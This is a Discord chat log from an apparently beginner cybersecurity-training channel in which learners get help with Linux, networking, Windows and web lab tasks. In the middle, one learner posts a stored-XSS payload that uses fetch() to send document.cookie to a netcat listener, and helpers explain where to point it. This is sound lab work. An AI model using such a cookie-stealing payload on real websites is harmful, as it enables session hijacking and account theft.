#pre-security-legacy-path

1 messages · Page 12 of 1

silver night
#

But maybe it's my mobile cutting it off 🤷🏼‍♂️

#

Thanks for your answer

last schooner
#

No worries

icy flicker
#

Is there hands on type of thing to learn beginner networking stuff, im just getting really bored and de motivated listenting to videos and reading stuff.

thorn verge
#

Packet tracer could be good.

You can build networks

naive aspen
# icy flicker Is there hands on type of thing to learn beginner networking stuff, im just gett...
covert coyote
#

Hi, I am stuck at a question in windows Fundamentals 1 in task 8. The question is: In the Control Panel, change the view to Small icons. What is the last setting in the Control Panel view? Can someone help me with that?

thorn verge
#

What is the issue? That's a pretty straight forward task

exotic hazel
#

somewhat security related - most entry level IT help desk jobs want active directory experience, not sure if tryhackme has windows labs yet(i'm new). considering windows server costs hundreds of dollars what are the best virtual learning tools for AD, Domain controller etc? Thank you

warm epoch
exotic hazel
somber currentBOT
#

Gave +1 Rep to @warm epoch

warm epoch
#

Look at Azure for Students

#

Lots of free stuff on that

exotic hazel
#

Ahhh, cool! I see that now

#

Thank you!

#

Only 100 bucks if enrolled

unique zephyr
#

i am confused, isn't that the purpose of TCP? so if one "chunk" of data is missing then it will be sent again

warm epoch
inner flax
# warm epoch Weird. Mine was free.

MS academic program depends on the type of partnership with the school - it was free at my community college, but my university had a fee to enroll it

potent wedge
unique zephyr
#

the key is good connection for TCP Then

potent wedge
#

no not a good connection... but one that is reliable enough to get all the parts to the end point

unique zephyr
#

cool thx !

warm epoch
#

It's resent if packets are lost

#

Cc @unique zephyr

unique zephyr
#

thank you 🙂

potent wedge
warm epoch
potent wedge
#

¯_(ツ)_/¯

warm epoch
#

Using the word "chunk" is not great here either, makes it very unclear

potent wedge
#

yeah.... better worded explainations would help

unique zephyr
#

Yup😅

final solar
#

ayooo

daring cliff
#

hello
I am learning Linux fundamentals 1
when i started the Attack Bus and installed the machine, the terminal loaded into root
and not as a standard user
now i am unable to do the exercises

soft snow
blissful pond
#

Hello, I am having difficulty with Linux Fundamentals part 3 task 4. I am not able to use wget command to download the file from the virtual machine. I followed the walkthrough but I cannot connect to machine with wget.

#

I was able to get the flag by ssh onto the machine and cat the .flag.txt file in the machine. But Why does wget not work for me?

soft snow
blissful pond
#

oh no nvm thank you

#

not on target machine

marsh veldt
#

boys i just finished presec pathway!

#

im very stoked i didnt have to use hints or writeups nearly at all and i memorized plenty of terms and information

frigid crown
#

Nice. Im just getting here from complete beginner. Time to work on this path. Looks like 44% of it was complete with the complete beginner path

tight gate
#

Nice

#

Happy New Month From Here To Everyone

quaint plaza
#

Yo wassup guys. Would you recommend pre-security -> complete beginner -> web-fundamental -> jr pentester -> offensive pentesting

tight ingot
#

Pre-sec => JT Pentest

quaint plaza
#

oh dayum

#

aight

remote ravine
#

in the windows fundamentals course, what linux program is that which they show in the screenshots for RDP? is that native on kali installs?

thorn verge
#

Without looking at it because I'm lazy, is it remmina?

remote ravine
#

Yes I figured that out eventually looking through blogs about RDP on linux.

zinc skiff
#

In linux fundamentals part 2
The vm box directory is not what’s expected to be. Meaning, when I spin up my machine i get access to the GUI where there’s only root’s home folder … etc

#

But the questions seem to refer to something different other that what’s in the contents of this machine.

#

I have tried tree command to scan the home folder and grep to determine if these files in the questions exist without luck

warm epoch
#

You likely haven't deployed the target machine, or you need to change VM using the tabs at the bottom of the in-browser display.

#

If you click "Start AttackBox" then it will start the attackbox. You need to click the "Start Machine" button.

zinc skiff
#

Right it says it’s the attackbox. What am I doing wrong?

zinc skiff
#

Oh! So I should “deploy a machine” instead of attack box?

warm epoch
#

Not a machine. The machine.

zinc skiff
somber currentBOT
#

Gave +1 Rep to @warm epoch

warm epoch
#

The attackbox is a machine you fully control, you use it to attack the targets

#

The targets are deployed in tasks with the Start Machine button. Their IP is shown under "Active Machine Information"

zinc skiff
#

So, after I hit “start machine” top left corner. There’s this little red box that says active machine info with the ip addr of the machine etc. when trying to access it by hitting the [?] button it gives 2 options vpn or attack box. And I am back to square 1 😂

warm epoch
#

Have a read through task 2

zinc skiff
#

If I access it through AttackBox. That’s where I don’t have the same file system content as the questions.

warm epoch
#

It talks you through accessing the target machine from the attackbox.

warm epoch
zinc skiff
#

Sure. Perhaps I missed sth.

#

Thank you though

quaint plaza
#

For anyone doing the linux room rn, when it gives you the extra resource for regex, take it. Im doing some CTFs on basic linux usage and it is really useful for grepping out flags from large text files

zinc skiff
somber currentBOT
#

Gave +1 Rep to @warm epoch

zinc skiff
#

What would be a good path for someone like me who does not seek a job in this space but really curious to discover and learn about the CS dangers/benefits?

quaint plaza
zinc skiff
wide scaffold
#

I'm having trouble with linux fundamentals part 3 task 4. I am running the python server on the ssh they gave me and using the wget command on a different empty terminal but I'm getting an "code 404" error in both terminals that "file doesn't exist". Why is this happening?

hot scaffold
#

I am having difficulty in entering linux fundamentals 1 lab. the ssh is asking for public key.can anyone help?

warm epoch
#

2 uses SSH.

wide scaffold
somber currentBOT
#

Gave +1 Rep to @ornate rover

daring cedar
#

For linux fundamentals 3 where is the cron job located?

daring cedar
proud karma
#

I'm going through pre-security right now. Loving it.

plush snow
#

helo peeps having asn issue on the 1st linux room

#

trying to play around with the >> & > commands with the test room and i keep getting errors?

#

keeps saying bash:folder3 is a directory

#

after trying out echo hello >> folder3

warm epoch
plush snow
#

understood. so what can i do in this box to play with the commands?

#

just want to try stuff out in a simple way

#

oh

warm epoch
#

Don't write to a directory - think about how it works

plush snow
#

could i do echo hello >> note.txt

warm epoch
#

A folder contains files, the folder isn't a file

warm epoch
plush snow
#

but if it did it would add to it right?

#

it would become
hello world
hello

warm epoch
plush snow
#

cool i figured it out!

#

thanks!

warm epoch
#

Correct, but you can't write to it like a file.

plush snow
#

in the attack box in lunix 2 how do i get to the root folders? like var,temp,etc

#

i dont think the task tells me how to get there??

#

aha

#

found it

warm epoch
plush snow
#

its part of thw tasks to navigate to them

#

was not putting the correct ///

warm epoch
plush snow
#

thanks!

#

also save the online man page

#

feel like that will be used a lotkekw

hot scaffold
#

l can't log in to lab on Linux fundamentals 2. it is asking for public key. How do I go about it

hot scaffold
somber currentBOT
#

Gave +1 Rep to @warm epoch

soft snow
#

!docs verify

rain berryBOT
somber currentBOT
#

Gave +1 Rep to @soft snow

frank vine
#

Hi, I'm stuck on Linux Fundamentals Part 3 Task 4

#

here's a screen shot

warm epoch
warm epoch
# rain berry

Please follow the steps in this link here in order to do so

frank vine
#

I can't seem to find this hidden file .flag.txt anywhere. Any ideas?

#

@wide scaffold looks like I'm having the same issue you had. Did you get a resolution to this?

ornate rover
frank vine
#

ok thanks @ornate rover will try that!

somber currentBOT
#

Gave +1 Rep to @ornate rover

warm epoch
#

Before restarting, cd ~ and run ls -a

frank vine
#

thanks @warm epoch will try that too!

#

I can see the hidden file now @warm epoch which is great but still having trouble downloading to the AttackBox. I'm guessing it's the location I'm referencing in the url?

warm epoch
#

Why did you do that?

frank vine
#

I ran it from the home directory per the instructions

wide scaffold
ornate rover
#

Go to /tryhackme directory

warm epoch
ornate rover
warm epoch
frank vine
#

oh I gotcha

ornate rover
warm epoch
#

A leading slash on the paths means it's relative to the root directory, which is /

#

there is no /tryhackme on the box

ornate rover
frank vine
#

thanks so much @ornate rover @warm epoch @umbral remnant !! Finally got it to work

somber currentBOT
#

Gave +1 Rep to @ornate rover

warm epoch
ornate rover
#

Yes I know! What I meant was that when I started the machine to browse the directories I went to the root and simply typed /home/tryhackme to navigate to the main directory of the exercise, as he was in /home I told him to go to /tryhackme but in this case it was so he just typed cd tryhackme instead as you said. I was the one who had to type the whole path because i was in the root

warm epoch
ornate rover
#

if he had just typed cd # it would have solved it too

warm epoch
#

If you want to specify that it's a directory, you'd usually add a slash at the end, tryhackme/

ornate rover
cedar flame
#

I found mistakes explanation in Web Works - DNS in details room

warm epoch
velvet surge
#

i'm doing my best to understand Network Fundamentals but i still feel lost, should i move on cuz they will start to make sense in the future ? or try harder?

soft snow
somber currentBOT
#

Gave +1 Rep to @soft snow

cedar stratus
#

After ssh the Linux Machine from AttackBox, Passwod is getting denied even though both Username and Entered password correct that is tryhackme. Any suggestions ?

tight ingot
cedar stratus
#

Permission Denied

last schooner
#

And also verify your discord account with the discord bot so you could post screenshots if needed

#

!docs verify

rain berryBOT
cedar stratus
last schooner
#

what task are you on

tight ingot
#

What is the machine ip?

cedar stratus
#

Deploy Your Linux Machine for Learn the Linux Fundamentals Part 3

#

10.10.142.182

#

Is Machine IP

last schooner
#

Well you need to SSH into the machine what command are you using?

cedar stratus
#

ssh 10.10.142.182@rain berry

tight ingot
#

Wrong way

#

Tryhackme@10.10.142.182

cedar stratus
#

Ok Thanks

#

It worked Thank you very much @tight ingot .

somber currentBOT
#

Gave +1 Rep to @tight ingot

tight ingot
#

No problem! Glad you got it, Happy Hacking!

plush snow
#

kinda stuck on the windows fundamentals part 1?

#

cant seem to get an answer to the notifcations question or "what selection hides/disables" the search box

last schooner
plush snow
#

windows sure

last schooner
#

Well why don't you try to hide the search box then? 😄

#

And see what the options is called

plush snow
#

i see

#

i assumed i was expected to answer using the text or the attackbox

last schooner
plush snow
#

we got it we there

plush snow
#

another one

#

im unsure what it means when it asks "what is the account status?"

#

is it asking the status of the guest profile or a defination of the meaning

#

nevermind

#

got it

ocean totem
#

Over 60 percent finished with this pathway. I lurk in the group often without saying anything. The few times I was in here it just kept me motivated to keep going. Thanks Everyone!

frank vine
#

Keep chipping away @ocean totem

autumn portal
#

Hi, I'm on the biography maker in the Bash Scrypting module and I get stuck here:
"Maybe try to make a small biography generator, where you take the name, age and job as parameters. Store them in a variable and display them on the screen in a sentence".
Here's what I tried but it doesn't work:

#!/bin/bash
biography=$1
biography=$2
biography=$3
echo "Enter your name, age and occupation".
read $biography
echo "Your name is $1, your age is $2 and your job is $3".

potent wedge
autumn portal
#

@potent wedge is that right? :

#
#!/bin/bash
biography=$#
echo "Your name is $1, your age is $2 and yor job is $3"
potent wedge
#

basicly yes

#

but also no

#

now you are also not using the biography variable

#

technically you were not before either

autumn portal
#

how can I echo "Enter your name, age and job" before?

potent wedge
#
#!/bin/bash
echo "enter your name."
read name
echo "enter your age."
read age
echo "enter your job."
read job
echo "your name is $name, your age is $age and your job is $job"
#

is how shadow would do it

autumn portal
#

Ok but I have to store the parameters name, age and job in one variable.

potent wedge
#

ah

sand sonnet
#

nearly finished pre security, good bye forever

potent wedge
#

or you could come back here and help others to help you remember

sand sonnet
#

fine

#

shadow makes a possibly good point

unique zephyr
#

hey, i need help with the How websites work JavaScript Section

#

pls

potent wedge
#

sure what is your problem

unique zephyr
#

i can't figure out the script 😅

#
Click the "View Site" button on this task. On the right-hand side, add JavaScript that changes the demo element's content to "Hack the Planet"```
#

i tried stuff with the code

document.getElementById("demo").innerHTML = "Hack the Planet";
warm epoch
#

Perhaps innerHTML isn't the right way?

unique zephyr
#

i copied it from the examples above the questions 😅 i do not know JS

potent wedge
#

nope that is how shadow did it too and it should work

unique zephyr
#

humm

warm epoch
#

innerHTML just makes me cringe internally because it's often why XSS vulns happen

unique zephyr
#

what is the tag format?

#
<script>document.getElementById("demo").innerHTML = "Hack the Planet";
</script>```
potent wedge
#
<!DOCTYPE html>
<html>
    <head>
        <title>TryHackMe Editor</title>
    </head>
    <body>
        <div id="demo">Hi there!</div>
        <script type="text/javascript">
            document.getElementById("demo").innerHTML = "Hack the Planet";
        </script>
    </body>
</html>
``` is the entire code shadow used to get the answer by then clicking the render option
unique zephyr
#

hu

#

so i do not need another tag xD

potent wedge
#

nopes

unique zephyr
#

so i did right, almost at least XD

#

i see why it didnt look right
because there is no color to the text it is black font so i thought it is not recognized

unique zephyr
#

i managed how website works and understood nothing in the last tasks 😂

pastel iron
#

anyone doing Nmap or wireshark DM me

gaunt thicket
#

hey i just end the pre security and i'm really confused what i should learn , i need a path which i can't understand . Anyone here pls help me!!

glossy scaffold
#

After pre-security, I joined junior pentester. I'm really enjoying it.

gaunt helm
#

I went pre-security into complete beginner 😅

earnest aurora
charred trench
#

do i still get the certificate when i complete the path without completing the rooms that i need to pay for?

#

:-(

#

so I can only get any of the certificates by subscribing?

#

ok, but thanks for your reply :)

lunar latch
#

Hello there, I've just started on THM but something is bothering me in the Packets & Frames Room#1. Think of this as putting an envelope within an envelope and sending it away. The first envelope will be the packet that you mail, but once it is opened, the envelope within still exists and contains data (this is a frame) I find this pretty misleading as it can mean that a frame is contained inside a packet. Also, the terminating () could imply the frame represents the data contained. For a beginner path it should avoid any misleadings on this basic concept. Please do tell me if I am the only one worried about that 😅

lunar latch
#

Just had the same reaction 😄

#

Oh thanks !

charred trench
#

Can someone suggest me in what ordner i should complete the 7 learning Paths?

#

Ok thx :)

fathom roost
#

Any reason why jr pentester > offensive pentestinhg?

#

I’m currently following pre security and I’m hesitating between jr pentester and offensive

#

Ah

#

Okay

#

And complete beginner is a waste of time now?

#

Okay thank you

sinful dragon
#

Ho wait

#

Wrong room 😄

round adder
# fathom roost And complete beginner is a waste of time now?

That path is really fun to do and it's teaching you the fundamentals, without the fundamentals it will get harder for you to understand some stuffs in the path you're doing at some point, and #878393611929129000 is teaching you how to use tools like nmap, burp, and is preparing you with some enum methods for some services that you can encounter irl scenarios, also there is a module that is teaching you how to crack passwords etc

pliant nimbus
#

I am doing the complete beginner path at the moment, and enjoying it very much.

split oriole
#

is it okay to start offensive pentesting after pre-security or should i start jr penetration tester after pre-security need suggestions🙂

#

Ok

marsh veldt
#

Hi there, when would you recommend doing the comptia+ path? In about a month I will have the right to have a course up to €1000 for free. I am really wondering what the best option would be. I am very new. Still at pre security path at linux fundamentals part 2. Thanks in advance

somber currentBOT
#

Gave +1 Rep to @trail flame

marsh veldt
#

Yeah im between JR pentester and complete beginner

#

Allright then JR pentester it is. Appreciate the help

narrow blaze
#

hello anyone active in the chat right now

proud rose
#

@narrow blaze hi! i'm getting online now, i'll be hanging out for a while if you wanna hop in chat 😄

narrow blaze
#

@proud rose I’m just now seeing this mate

marsh veldt
#

hi all

exotic hound
wary sapphire
#

Hey, I have a question;

#

Are system administrators able to choose between protocols like UDP/TCP or is that chosen automatically by the server/computer?

soft snow
wary sapphire
#

Alright, thanks!

mossy quartz
#

So many smart people in here

subtle epoch
#

Anyone else finding this kinda intimidating?

soft snow
subtle epoch
#

remembering it all

soft snow
# subtle epoch remembering it all

Well, I wouldn't call it intimidating rather then overwhelming at the beginning.
So yes, it can be overwhelming when you start out with it :=)

subtle epoch
#

I suppose. pentesting was my dream as a kid but I kinda realized its not for me, but its def something I want to look into

#

and ngl that kind of hurts

#

but hell, im learning

#

lmao sorry for the info dump

soft snow
round adder
fading girder
#

and then refer to it when u start going through more advance stuff or real hecking

#

u will also start to connect the dots

subtle epoch
#

It's just that I feel so dumb reading through all of the course material, and still not knowing entirely how to run the commands

sage cobalt
#

That happens in the beginning and you will learn those where it automatically will come to your fingers

subtle epoch
#

Yeah and you have a point, but for example I couldn't get past the linux fundamentals without walkthrough vids, i feel like im cheating

naive aspen
#

Going through the motions can help things make sense, or you can experiment and do the 'wrong' thing sometimes and learn something by observing what happens
I think it's really about just spending time with it, absorbing the nuances, as long as you're always trying to understand something about it or taking it in actively/critically, you should come out the other side with improved understanding

sweet shuttle
#

I'm on the part on windows fundamentals 1 and trying to remote access to standard user in TASK6, How do I connect?

tight ingot
sweet shuttle
#

TASK7 sorry, Log in as the standard user and try to install this program. To do this, you can remote desktop into the machine as the standard user account.

Note: You have the username and password for the standard user. It's visible in lusrmgr.msc.

tight ingot
#

UAC?

sweet shuttle
#

yeah it isn't part of the question it is in the main section of the page

candid ibex
#

Are the paid courses on tryhackme compulsory knowledge?

#

ex: OSI model, Packets and frames etc

warm epoch
pseudo sedge
#

Linux fundamentals part 3, task 8-getting IP for site visitor???

#

I cd into /var/log on my deployable machine but don’t see an apache2 directory, so how can I answer that question?

warm epoch
pseudo sedge
#

I tried to ssh into target machine with no luck

warm epoch
pseudo sedge
#

I restarted my attack box and successfully ssh’d into target machine and now see apache2 dir. Not sure why it didn’t work the first time.

rose flame
#

Hi...

#

Dear i need support regarding XSS in junior penetrating tester

#

in task 8 i need to grab Cookie using NC but unfortunately its not grabing the cookie someone please explain me the reason behind it

#

nc -nlvp 9001 this is the command i m using

#

</textarea><script>fetch('http://10.10.254.129:9001cookie=' + btoa(document.cookie) );</script>

#

thats the script as my machine ip is 10.10.254.129

tight ingot
#

Dont use the target machine ip

#

Use your tun0

rose flame
#

tun0?

tight ingot
#

ip a s

#

tun0 is your THM ip.

rose flame
#

u mean my Attackbox ip right ?

soft snow
rose flame
#

the machine i m using to access the website

tight ingot
tight ingot
rose flame
#

i m using my attack box ip

tight ingot
#

To me Machine ip = target ip

tight ingot
rose flame
tight ingot
#

It's mine.

rose flame
#

i m using attackbox ip

#

Listening on [0.0.0.0] (family 0, port 9001)

#

this is the payload i , using

#

can u please rectify the mistake ?

#

/ i just write while typing here

#

</textarea><script>fetch('http://{URL_OR_IP}?cookie=' + btoa(document.cookie) );</script>

#

this is in task text

#

this is the one i m using

#

i m not getting anything

rose flame
#

got it

#

i guess the problem was i was using thmlabs.com instead of target machine ip

#

thank u soo much for the help

#

noo... ip was correct i tried several times'

#

😆

rancid lotus
#

Boutta start Part 1 of the Linux Fundamentals

#

If i have any questions I'll reach out

potent wedge
#

and shadow and others will be here and answer

rancid lotus
#

I don't understand the grep command that well

#

Trying to use it on terminal (on mac) and can't get a hang of it

potent wedge
#

it checks the contents of a text file and if it finds what you gave it as a search term it prints out that line to the screen

rancid lotus
#

Ah I think I get it

#

Like looking for key terms in whatever file that term may be in?

potent wedge
#

yuups

#

it gets a bit tricky when you use it to do recursive searches through multiple files though but that is extra fluff to learn later

marsh veldt
#

It’s also really useful to search inside command outputs using the pipe symbol

rancid lotus
#

Thank you

rancid lotus
#

Do you recommend using the linux machines given to us on the website? I've been going back and forth and applying what I've learned on my mac terminal.

#

Oh wait nvm

#

I forgot we gotta use them to answer the questions lol

#

I actually do have a virtual machine installed

#

I just haven't set it up yet

silk beacon
#

I cannot when will the crontab be deployed on my machine for Linux fundamentals part3

marsh veldt
#

I am struggling with trying to copy file from smb: .ssh to local machine. Please help.

haughty peak
marsh veldt
#

Hi ayushh, Sorry for lack of clarity. This is the question: smb:.ssh>id_rsa and id_rsa.pub
move to root@kali:\
Question 8: Download this file to your local machine, and change the permissions to "600" using "chmod 600 [file]". Now, use the information you have already gathered to work out the username of the account. Then, use the service and key to log-in to the server. I'm lost. I know how to copy and move within the same directory, but not from smb/ssh to root kali. Help is greatly appreciated.

soft snow
marsh veldt
#

I see now. I used the correct command it put the files where I needed them. I don't think I used get prior. Now I'm off to change the permissions. Don't know what I'm doing, but I'm going to give it a shot!

marsh veldt
#

I have everything except how to get the flag. Now, use the information you have already gathered to work out the username of the account. Then, use the service and key to log-in to the server. I am stuck again.

soft snow
#

!docs verify

rain berryBOT
fading hinge
#

Am I supposed to get a different answer when using the command whoami in the Linux Fundamentals Part 1/ Task 4?

#

hint says use whoami, the answer is expecting a longer string, but when i run whoami, the output is root

warm epoch
fading hinge
#

I ended up terminating it and redoing the step and I got it working now, thanks!

noble cloak
#

anyone using telegram here ?/'\

warm epoch
warm epoch
#

Have a read through #start-here and the channel topic with each channel

latent compass
#

PreSec isn't too difficult so far

#

I think once I get through PreSec I should do complete beginner right?

#

I'm gonna be working through a lot of this stuff

#

this stuff is fun

marsh veldt
#

So looking for minimal guidance. Linux Fundies part 3 when inputting the python3 -m http.server command it seems to boot me out of user? So I can’t execute wget to get the flag? I say minimal guidance because I just need a nudge in the right direction I still want to do things myself. That’s why I’m not just YouTubing a solution lol

rough delta
#

Can you share the screenshot?

latent compass
#

hi the ctrl+x is not working in THM linux fundamentals room 3

#

hold on a sec let me try something

#

I fixed it

#

never mind

marsh veldt
#

Thank you. I figured out that running in background works as well so I figured out how to do that. Then had to figure out how to kill the program. Spoiler: idk why ctrl+c only sesulted in ^C being printed so had to use “kill” command then found out that “kill -15” allows for clean up and “SIGTERM” (which is supposed to do the same) doesn’t work. Am I missing a ton? I’m finding different ways to do things but THM is teaching differently so am I missing the lesson?

somber currentBOT
#

Gave +1 Rep to @trail flame

soft snow
# marsh veldt Thank you. I figured out that running in background works as well so I figured o...

It probably only resulted in that because you had the python server running in the background. So you would have to foreground the python server first and then use ctrl+c
Beside that, as you said "running in the background works as well" sounds to me that you are using wget in the same terminal as you used to start the python server, which means you download the file from the target machine to the target machine, which makes no sense

marsh veldt
#

Ok gonna have to play with it more. When I fg python I can’t use commands but can’t remember if I tried CTRL+c. Wanna say yes but will attempt again.

marsh veldt
soft snow
#

E.g transferring linpeas or any other script to your target machine

marsh veldt
#

Geez I’m gonna have to redo it. So python running on the target and don’t ssh into target on new terminal and wget from there?

marsh veldt
# soft snow Right

Well at least I understand the concept. Better late then never. When I get home will redo that and I’ll @ you when I’m successful lol appreciate all the help you and @trail flame . Would have gone all through thm thinking wrong was right.

marsh veldt
#

@soft snow did it. The ctrl+c worked also. And I now understand the “why” as well so thank you and @trail flame again!

somber currentBOT
#

Gave +1 Rep to @soft snow

soft snow
#
  • @trail flame
somber currentBOT
#

Gave +1 Rep to @trail flame

potent wedge
#

Please do junior pentester instead of complete beginner first... Complete beginner is depractated

inner flax
#

If you are concious about your online privacy, be careful of posting screenshots that could contain personally identifiable information

potent wedge
#

shadow assumed if they decided to share it they probably already regard it as okay for their own privacy

marsh veldt
somber currentBOT
#

Gave +1 Rep to @potent wedge

marsh veldt
potent wedge
#

+rep @inner flax

somber currentBOT
#

Gave +1 Rep to @inner flax

potent wedge
#

no problem just thought the knowledge of that would be helpful

marsh veldt
potent wedge
#

in this case both

chilly elm
#

guys i need help

#

when i open terminal all time its shows there is a back space

#

like this

potent wedge
#

might be your prompt being configured to have a space at the start of it

chilly elm
#

how i can make it like this when i open terminal all time

potent wedge
#

also this is not really related to this path and should therefor probably go in #infosec-general

chilly elm
#

k

marsh veldt
potent wedge
#

nah do intro to cyber first if you feel like it

#

it will point you into what you might want to do in this field

marsh veldt
#

Cool thank you 🙏🏻

forest heart
round ginkgo
#

Haven't been able to find the cron job for linux fundamentals 3, tried every relevant command or directory I can find on google. Can anyone direct me?

potent wedge
#

cat /etc/crontab or crontab -e

#

also are you on the target machine instead of the attackbox

round ginkgo
#

I've tried both those and I'm on the target machine

#

Tried reboot, reboots etc

#

every combination of monthly, weekly etc and nothing has worked

potent wedge
#

oh you are wondering what the correct answer is???

#

while you have viewd the crontab file???

round ginkgo
#

Well I thought it started at reboot as that was the only job but it was wrong

potent wedge
#

yes and that is exactly what it does

#

the answer needs @ symbol before the word to work though

round ginkgo
#

🤦‍♀️

#

I thought it was only letters because of the *s in the textbox

#

Thank you

potent wedge
#

@ counts as a letter according to those

#

no problem

round ginkgo
#

because some of the previous ones showed where the symbols were, it was confusing (Such as *{...)

potent wedge
#

ah yeah {} . and spaces get shown as other chars then * in answers

round ginkgo
#

Anyway, thanks again!

potent wedge
#

good luck and keep going

runic vortex
#

It was rough at times, but I finished!

cursive plume
#

Slowly working through this path

stiff granite
#

In the learning path "Jr Penetration Tester" -> "Introduction to Web hacking" -> "Walking an application" the URL "https://LAB_WEB_URL.p.thmlabs.com" is not accessible. The error i get is "504 gateway timeout". Please help me getting this URL working plus

small spire
stiff granite
#

I did start the machine, and i see the IP. What should we do with the IP of the VM?

#

I am able to see the Ubuntu machine and the exercise mentions that "Start the virtual machine on this task, wait 2 minutes, and visit the following URL: https://LAB_WEB_URL.p.thmlabs.com (this URL will update 2 minutes from when you start the machine)". I tried opening this URL in the Ubuntu Machine using firefox. And i get the error "504 gateway timeout"

#

Its working now, after rebooting the VM a couple of times.

cursive plume
#

Why am I seeing a section from Introduction to Cyber Security in the Pre Security path now?

small spire
cursive plume
#

That's what I thought at first, but it's the same content in both paths now

small spire
#

idk, they might merge stuff later 🤷‍♂️

cursive plume
#

Idk maybe. To me it seems more like something got messed up. There was a different room there before, that I already finished, but it's gone now.

fierce juniper
cursive plume
fierce juniper
#

¯_(ツ)_/¯

#

Probably just lessons used for the same path.

ripe jackal
#

After pre security whats the next course I should take?

soft snow
ripe jackal
potent wedge
somber currentBOT
#

Gave +1 Rep to @potent wedge

potent wedge
#

you're welcome

unreal anvil
somber currentBOT
#

Gave +1 Rep to @potent wedge

potent wedge
formal pike
#

Burp Suite: The Basics
Task 9:
Read through the options in the right-click menu.

There is one particularly useful option that allows you to intercept and modify the response to your request.

What is this option?

Note: The option is in a dropdown sub-menu.

#

I don't find the option I don't knoww were to search

#

Can I have a hint or help ?

mint wadi
#

I'm in the Linux Fundamentals Room 3.

I'm having trouble getting the python3 -m http.server command to work. Specifically, when I run the command, my attack machine looks like the one in the first pic.

I don't understand how they got to a prompt that reads # wget http(interruptedLink)://127.0.0.1:8000/file with the pound sign.

When I try to run the code, it just hangs and doesn't show any activity. Specifically, I'll ssh into the target, then run the python3 httpserver, then it will sit there looking like the top pic. When I type in wget http(interruptedLink)://10.10.89.176:8000/.flag.txt I should be able to get the file and complete the task, but I'm not getting anything back. I know there's a fundamental piece of knowledge that I'm missing. Any ideas?

#

I believe that it is not hanging...I should have said "it looks like/as if..."
So the notion is to open another terminal and run the wget command from there? I'll try that. Thank you!

somber currentBOT
#

Gave +1 Rep to @trail flame

mint wadi
#

Yes, maybe a sentence could be written to instruct the student to open a new terminal. Lemme test this suggestion first, and I might send feedback to thm through another channel

#

Thank you! That worked.

  1. I used ssh to get into the target, then opened python3 http...
  2. (This is the fundamental part I was missing) Then I opened a new terminal window and used ssh again to get the second shell into the target,
  3. Then ran the wget command to retrieve the file.
  4. Then I ran cat .flag.txt to read the file and get the answer.
  5. THen for fun I typed 'exit' a bunch of times.

Thanks again!

somber currentBOT
#

Gave +1 Rep to @trail flame

mint wadi
#

Cool, thank you for sharing that. I'll try it that way and see what happens.

I see the difference now. The first way I did it (adding another ssh) 'went into' the target to access the file, whereas the intended way connected and saw the file from the attacking machine. I think I get it now. I'm glad you said that, because testing the task both ways was very insightful!

mint wadi
#

I just figured out that the videos provide a complete walk-though of all the lessons in the room.

I had not been watching the videos, just reading the text and doing the exercises.

This will help out immensely next time I get stuck!

#

Thank you again!

somber currentBOT
#

Gave +1 Rep to @trail flame

mint wadi
#

I think that's because I'm 46 and I don't know how to write 'internet-speak' and without punctuation, hahaha!

vagrant hinge
#

what are the layers for in osi and tcp ip

#

so i dont understand it

#

when transferring data

#

so the data is going through the layers ?

#

layer 7 to layer 6 to layer 5...

ashen oxide
#

iirc the osi model and the tcp/ip model similar but different models

#

ip corresponds to the 3rd layer (network) while tcp corresponds to the 4th layer (transport) (edited)

#

The different layers are just different representations of what is happening. The first layer is a very zoomed in version (application) while you further and further zoom out until you end up at the physical layer which is just the network cable itself

#

so the data goes through all layers at the same time!

ashen oxide
warm epoch
#

Routers are layer 3 devcies, which is a good way to remember it

#

Routers 3, switches 2, cables 1

ashen oxide
#

That makes it easier to remember, thanks!

#

If we spun it further, could you say: TCP/UDP connections 4, Ports 5, SSH/FTP 6 and Browserapp 7 ?

warm epoch
#

No

#

Ports are part of 4

#

SSH is a tricky one because of some of it's networking features, but FTP and HTTP are both pretty clealy the same

#

Half the time you won't care above layer 4 anyway

#

The whole point of the layer structure is that you don't have to worry about the layers above or below too much

ashen oxide
#

Hmm I see

#

So 6 and 7 would already be stuff that is not really related to networking itself

warm epoch
#

I mean?

ashen oxide
#

Makes sense 😅

cursive plume
#

Why is it a disadvantage of UDP that it is flexible to software developers? Flexibility sound like a good thing. 🤔

ashen oxide
#

I guess flexible software also means easily breakable which would be a disadvantage if you look at it from a security perspective (introduction of exploitable bugs)

ashen oxide
marsh veldt
#

‘-‘

potent wedge
scarlet siren
#

hi, i need help with NFS … i am struggling there and can not move on 🥲

gloomy steeple
#

Hey guys!
Was doing the network chapter about the OSI MODEL and sometime it is not always clear to me WHAT is used to switch from a layer to another.

For example: the transformation from the Application layer, to the Presentation layer, will usually be made by the used application.

Or the transformation from the network layer, to the data link layer is usually made by the router (if I am correct)

Would you guys have a list of all the actors of those "transformations", and which transformation they operate EXACTLY?
From the apps, to OS's, routers, servers, etc ...

Thx 🙂

warm epoch
#

Think of them as distinct layers

#

Your structure like an HTTP request will exist in a TCP packet, which will eventually exist on the wire as one or more ethernet frames

#

The whole idea of dividing it into layers is so that you don't care what the layer above or below is doing as long as it's doing it's job.

#

You being someone implementing or troubleshooting something

gloomy steeple
# warm epoch Don't think of it as going between layers

Hey there, thx for your answer! 🙂
I understand the purpose of adding or removing the layer to focus only on what data is useful to you.

However, I'd still want to have an idea of who/what is adding each layer, when sending data bits. I think it would just help me get a better idea of how things work 🙂

somber currentBOT
#

Gave +1 Rep to @warm epoch

warm epoch
#

I'd recommend searching for examples of each layer then

gloomy steeple
#

lol okay 🥲
I was hoping for some beautiful diagram 🤩

#

but i did not find it lol

nova sigil
#

hey guys I about to start pre-security today. if anyone's interested in being learning buddies feel to message me

sand sonnet
# gloomy steeple Hey there, thx for your answer! 🙂 I understand the purpose of adding or removin...

a program basically sends some application data to other programs or to the operating system. more data gets added to the front before being sent over physical media. the recipient unpacks it until it gets the application data and sends it to the relevant app. you could think about which osi layers the headers correspond to but there are ways of sending data where the headers aren't ordered so that they look like the osi model

sand sonnet
ruby yew
#

For the Packets & Frames room, I don't quite understand the 1st sentence:

Packets and frames are small pieces of data that, when forming together, make a larger piece of information or message. However, they are two different things in the OSI model. A frame is at layer 2 - the data link layer, meaning there is no such information as IP addresses. Think of this as putting an envelope within an envelope and sending it away. The first envelope will be the packet that you mail, but once it is opened, the envelope within still exists and contains data (this is a frame).

#

Especially this sentence:
"A frame is at layer 2 - the data link layer, meaning there is no such information as IP addresses"

#

From my understanding, encapsulation is going from Layer 7 ---> 1.

#

So Layer 2 (frame) should have IP header as well

sand sonnet
#

frames have a mac address

#

eg. a web request

#

